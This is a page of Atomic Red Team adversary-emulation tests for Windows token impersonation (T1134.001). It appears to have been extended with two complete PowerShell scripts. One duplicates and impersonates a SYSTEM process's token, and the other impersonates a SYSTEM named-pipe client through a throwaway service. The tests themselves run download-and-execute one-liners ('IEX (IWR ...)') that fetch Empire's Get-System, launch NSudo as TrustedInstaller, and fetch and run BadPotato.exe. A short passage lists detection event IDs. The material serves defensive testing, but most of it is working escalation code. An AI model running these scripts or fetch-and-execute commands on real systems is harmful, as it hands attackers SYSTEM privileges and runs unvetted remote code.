T1134.001
Access Token Manipulation: Token Impersonation/Theft
Description from ATT&CK
Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using DuplicateToken(Ex). The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread.
An adversary may do this when they have a specific, existing process they want to assign the new token to. For example, this may be useful for when the target user has a non-network logon session on the system.
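The API chain described above, as an added example that is not code from the ATT&CK entry, the Atomic Red Team tests or Empire's Get-System: it opens another process's primary token, duplicates it as an impersonation token with DuplicateTokenEx, applies it to the calling thread with ImpersonateLoggedOnUser, reads back the effective identity and reverts. It assumes an elevated PowerShell session (an administrator's token holds SeDebugPrivilege but disabled, so the example enables it first) and that -TargetPid belongs to a SYSTEM process such as winlogon.exe; the TokenApi wrapper class, the constants and the function names are this example's own, the API names are Win32.

```powershell
# Added example, not code from the Atomic Red Team page or from Empire.
# TokenApi, its constants and the functions below are this example's own.
$TokenApiSource = @'
using System;
using System.Runtime.InteropServices;
public class TokenApi
{
    public const uint PROCESS_QUERY_INFORMATION = 0x0400;
    public const uint TOKEN_QUERY = 0x0008, TOKEN_DUPLICATE = 0x0002, TOKEN_ADJUST_PRIVILEGES = 0x0020;
    public const uint MAXIMUM_ALLOWED = 0x02000000, SE_PRIVILEGE_ENABLED = 0x0002;
    public const int SecurityImpersonation = 2;   // SECURITY_IMPERSONATION_LEVEL
    public const int TokenImpersonation = 2;      // TOKEN_TYPE
    // PrivilegeCount followed by one LUID_AND_ATTRIBUTES; Pack=1 keeps the 16-byte native layout
    [StructLayout(LayoutKind.Sequential, Pack = 1)]
    public struct TOKEN_PRIVILEGES { public uint PrivilegeCount; public long Luid; public uint Attributes; }
    [DllImport("kernel32.dll", SetLastError = true)] public static extern IntPtr OpenProcess(uint access, bool inherit, uint pid);
    [DllImport("kernel32.dll", SetLastError = true)] public static extern bool CloseHandle(IntPtr handle);
    [DllImport("advapi32.dll", SetLastError = true)] public static extern bool OpenProcessToken(IntPtr process, uint access, out IntPtr token);
    [DllImport("advapi32.dll", SetLastError = true)] public static extern bool LookupPrivilegeValue(string system, string name, out long luid);
    [DllImport("advapi32.dll", SetLastError = true)] public static extern bool AdjustTokenPrivileges(IntPtr token, bool disableAll, ref TOKEN_PRIVILEGES newState, uint length, IntPtr previous, IntPtr returnLength);
    [DllImport("advapi32.dll", SetLastError = true)] public static extern bool DuplicateTokenEx(IntPtr token, uint access, IntPtr attributes, int impersonationLevel, int tokenType, out IntPtr newToken);
    [DllImport("advapi32.dll", SetLastError = true)] public static extern bool ImpersonateLoggedOnUser(IntPtr token);
    [DllImport("advapi32.dll", SetLastError = true)] public static extern bool RevertToSelf();
}
'@
Add-Type -TypeDefinition $TokenApiSource

function Get-LastWin32Error { [Runtime.InteropServices.Marshal]::GetLastWin32Error() }

function Enable-Privilege {
    param([string]$Name)
    $hTok = [IntPtr]::Zero
    $self = [Diagnostics.Process]::GetCurrentProcess().Handle
    if (-not [TokenApi]::OpenProcessToken($self, [TokenApi]::TOKEN_ADJUST_PRIVILEGES -bor [TokenApi]::TOKEN_QUERY, [ref]$hTok)) {
        throw "OpenProcessToken(self) failed: $(Get-LastWin32Error)"
    }
    try {
        $tp = New-Object TokenApi+TOKEN_PRIVILEGES
        $tp.PrivilegeCount = 1
        $tp.Attributes = [TokenApi]::SE_PRIVILEGE_ENABLED
        $luid = [long]0
        if (-not [TokenApi]::LookupPrivilegeValue($null, $Name, [ref]$luid)) { throw "LookupPrivilegeValue failed: $(Get-LastWin32Error)" }
        $tp.Luid = $luid
        # AdjustTokenPrivileges returns TRUE even when the token does not hold the privilege;
        # ERROR_NOT_ALL_ASSIGNED (1300) is the real failure signal.
        $ok = [TokenApi]::AdjustTokenPrivileges($hTok, $false, [ref]$tp, [Runtime.InteropServices.Marshal]::SizeOf($tp), [IntPtr]::Zero, [IntPtr]::Zero)
        $err = Get-LastWin32Error
        if (-not $ok -or $err -eq 1300) { throw "$Name could not be enabled (error $err); run from an elevated session" }
    } finally { [void][TokenApi]::CloseHandle($hTok) }
}

function Invoke-TokenImpersonation {
    param([Parameter(Mandatory = $true)][int]$TargetPid)
    $before = [Security.Principal.WindowsIdentity]::GetCurrent().Name
    Enable-Privilege 'SeDebugPrivilege'   # needed to open a SYSTEM process's token
    $hProc = [TokenApi]::OpenProcess([TokenApi]::PROCESS_QUERY_INFORMATION, $false, [uint32]$TargetPid)
    if ($hProc -eq [IntPtr]::Zero) { throw "OpenProcess($TargetPid) failed: $(Get-LastWin32Error)" }
    $hTok = [IntPtr]::Zero; $hDup = [IntPtr]::Zero
    try {
        # TOKEN_DUPLICATE on the source token is what DuplicateTokenEx requires
        if (-not [TokenApi]::OpenProcessToken($hProc, [TokenApi]::TOKEN_DUPLICATE -bor [TokenApi]::TOKEN_QUERY, [ref]$hTok)) {
            throw "OpenProcessToken($TargetPid) failed: $(Get-LastWin32Error)"
        }
        # Primary token -> impersonation token at SecurityImpersonation level
        if (-not [TokenApi]::DuplicateTokenEx($hTok, [TokenApi]::MAXIMUM_ALLOWED, [IntPtr]::Zero,
                [TokenApi]::SecurityImpersonation, [TokenApi]::TokenImpersonation, [ref]$hDup)) {
            throw "DuplicateTokenEx failed: $(Get-LastWin32Error)"
        }
        # The calling thread now runs under the duplicated token; SetThreadToken(hThread, hDup)
        # would do the same for another thread handle instead of the caller.
        if (-not [TokenApi]::ImpersonateLoggedOnUser($hDup)) { throw "ImpersonateLoggedOnUser failed: $(Get-LastWin32Error)" }
        try { $during = [Security.Principal.WindowsIdentity]::GetCurrent().Name }
        finally { [void][TokenApi]::RevertToSelf() }
    } finally {
        foreach ($h in $hDup, $hTok, $hProc) { if ($h -ne [IntPtr]::Zero) { [void][TokenApi]::CloseHandle($h) } }
    }
    [pscustomobject]@{ Caller = $before; Impersonating = $during; AfterRevert = [Security.Principal.WindowsIdentity]::GetCurrent().Name }
}

# Usage (assumption: winlogon.exe is running as SYSTEM and is not a protected process)
Invoke-TokenImpersonation -TargetPid (Get-Process winlogon | Select-Object -First 1).Id
```

The output object shows the caller's identity, the identity while the impersonation token is on the thread, and the identity after RevertToSelf; the middle value is what Test #2 reports. The impersonation token is only good for the thread that holds it: to hand it to a new process you would duplicate it again as a primary token (TokenPrimary) and use CreateProcessWithTokenW or CreateProcessAsUser, which is the step the Potato tools later on this page perform.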
Atomic Tests
Atomic Test #1 - Named pipe client impersonation
Uses PowerShell and Empire's GetSystem module. The script creates a named pipe, and a service that writes to that named pipe. When the service connects to the named pipe, the script impersonates its security context. When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM).
Reference: https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/
Supported Platforms: windows
auto_generated_guid: 90db9e27-8e7c-4c04-b602-a45927884966
Inputs:
None
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique NamedPipe -Verbose
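The named pipe variant that Test #1 exercises, as an added example that is not code from the Atomic Red Team page or from Empire's Get-System: the script listens on a pipe, installs a throw-away service whose binPath is a cmd.exe one-liner that writes into that pipe, and impersonates the connecting client (LocalSystem) for the duration of a script block using .NET's NamedPipeServerStream.RunAsClient instead of raw CreateNamedPipe/ImpersonateNamedPipeClient calls. It assumes an elevated PowerShell session (sc.exe create needs it); the pipe and service names and the function name are this example's own.

```powershell
# Added example, not code from the Atomic Red Team page or from Empire.
function Invoke-NamedPipeImpersonation {
    param(
        [string]$PipeName    = 'demo-' + [guid]::NewGuid().ToString('N'),   # example's own name
        [string]$ServiceName = 'DemoPipeClientSvc'                         # example's own name
    )
    $before = [Security.Principal.WindowsIdentity]::GetCurrent().Name
    # One duplex instance. No explicit DACL: the creator's default DACL admits SYSTEM and Administrators.
    $server = New-Object System.IO.Pipes.NamedPipeServerStream(
        $PipeName, [System.IO.Pipes.PipeDirection]::InOut, 1,
        [System.IO.Pipes.PipeTransmissionMode]::Byte, [System.IO.Pipes.PipeOptions]::Asynchronous)
    $box = @{}          # filled in from inside the impersonated script block
    $starter = $null
    try {
        # Start listening before the client exists so its connect cannot be missed
        $pending = $server.BeginWaitForConnection($null, $null)
        # The "service" is cmd.exe writing one line into our pipe. It runs as LocalSystem; the SCM
        # later reports error 1053 because cmd.exe never calls StartServiceCtrlDispatcher.
        $binPath = "cmd.exe /c echo connect > \\.\pipe\$PipeName"
        $out = & sc.exe create $ServiceName binPath= $binPath
        if ($LASTEXITCODE -ne 0) { throw "sc create failed: $out" }
        # sc start blocks until the SCM gives up on the service, so run it detached and wait on the pipe
        $starter = Start-Process -FilePath sc.exe -ArgumentList "start $ServiceName" -WindowStyle Hidden -PassThru
        $server.EndWaitForConnection($pending)
        $client = $server.GetImpersonationUserName()     # user name carried by the client's token
        $buf = New-Object byte[] 64
        [void]$server.Read($buf, 0, $buf.Length)         # drain the line cmd.exe wrote
        # RunAsClient = ImpersonateNamedPipeClient around the block, RevertToSelf when it returns
        $server.RunAsClient({ $box.Name = [Security.Principal.WindowsIdentity]::GetCurrent().Name }.GetNewClosure())
        $after = [Security.Principal.WindowsIdentity]::GetCurrent().Name
    } finally {
        $server.Dispose()
        & sc.exe delete $ServiceName | Out-Null
        if ($starter -and -not $starter.HasExited) { Stop-Process -Id $starter.Id -Force -ErrorAction SilentlyContinue }
    }
    [pscustomobject]@{ Caller = $before; PipeClient = $client; Impersonating = $box.Name; AfterRevert = $after }
}

Invoke-NamedPipeImpersonation
```

Impersonating is the identity the test reports (local SYSTEM) and AfterRevert should match Caller again, because RunAsClient reverts the thread when the block returns. For detection, the same run leaves a service-installed event (System log, Event ID 7045) whose ImagePath is a cmd.exe one-liner pointing at \\.\pipe\..., and, with Sysmon, a PipeCreated (Event ID 17) by the PowerShell process followed by a PipeConnected (Event ID 18) from a cmd.exe running as SYSTEM.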
Atomic Test #2 - SeDebugPrivilege token duplication
Uses PowerShell and Empire's GetSystem module. The script enables SeDebugPrivilege, then opens, duplicates and impersonates the token of another process. When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM).
Supported Platforms: windows
auto_generated_guid: 34f0a430-9d04-4d98-bcb5-1989f14719f0
Inputs:
None
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose
Atomic Test #3 - Launch NSudo Executable
Launches the NSudo executable for a short period of time and then exits. NSudo downloads have been observed following malicious document execution. NSudo is a system management tool that lets advanced users launch programs with full privileges; this test runs it with -U:T -P:E, i.e. it starts cmd.exe as TrustedInstaller with all privileges enabled.
Supported Platforms: windows
auto_generated_guid: 7be1bc0f-d8e5-4345-9333-f5f67d742cb9
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
nsudo_path | Path to the NSudo launcher executable (NSudoLG.exe) | Path | $env:TEMP\NSudo_8.2_All_Components\NSudo_Launcher\x64\NSudoLG.exe |
Attack Commands: Run with powershell!
Start-Process #{nsudo_path} -Argument "-U:T -P:E cmd"
Start-Sleep -Second 5
Stop-Process -Name "cmd" -force -erroraction silentlycontinue
Dependencies: Run with powershell!
Description: The NSudo launcher executable (NSudoLG.exe) must exist in the specified path #{nsudo_path}
Check Prereq Commands:
if (Test-Path #{nsudo_path}) {exit 0} else {exit 1}
Get Prereq Commands:
Invoke-WebRequest -OutFile $env:TEMP\NSudo_8.2_All_Components.zip "https://github.com/M2Team/NSudo/releases/download/8.2/NSudo_8.2_All_Components.zip"
Expand-Archive -Path $env:TEMP\NSudo_8.2_All_Components.zip -DestinationPath $env:TEMP\NSudo_8.2_All_Components -Force
Rename-Item "$env:TEMP\NSudo_8.2_All_Components\NSudo Launcher" $env:TEMP\NSudo_8.2_All_Components\NSudo_Launcher
Remove-Item $env:TEMP\NSudo_8.2_All_Components.zip -Recurse -ErrorAction Ignore
Atomic Test #4 - Bad Potato
Privilege escalation using named pipe connections (https://github.com/BeichenDream/BadPotato): BadPotato impersonates a privileged named pipe client and launches the supplied program (notepad.exe in this test) in that security context.
Supported Platforms: windows
auto_generated_guid: 9c6d799b-c111-4749-a42f-ec2f8cb51448
Inputs:
None
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
cd $env:temp
Start-Process .\BadPotato.exe notepad.exe
Start-Sleep -Second 20
Stop-Process -Name "notepad" -force -erroraction silentlycontinue
Stop-Process -Name "BadPotato" -force -erroraction silentlycontinue
Cleanup Commands:
taskkill /f /im notepad.exe
Dependencies: Run with powershell!
Description: BadPotato.exe must exist in the temp directory
Check Prereq Commands:
if (Test-Path $env:temp\BadPotato.exe) {exit 0} else {exit 1}
Get Prereq Commands:
Invoke-WebRequest -OutFile $env:TEMP\BadPotato.exe "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/bin/BadPotato.exe?raw=true"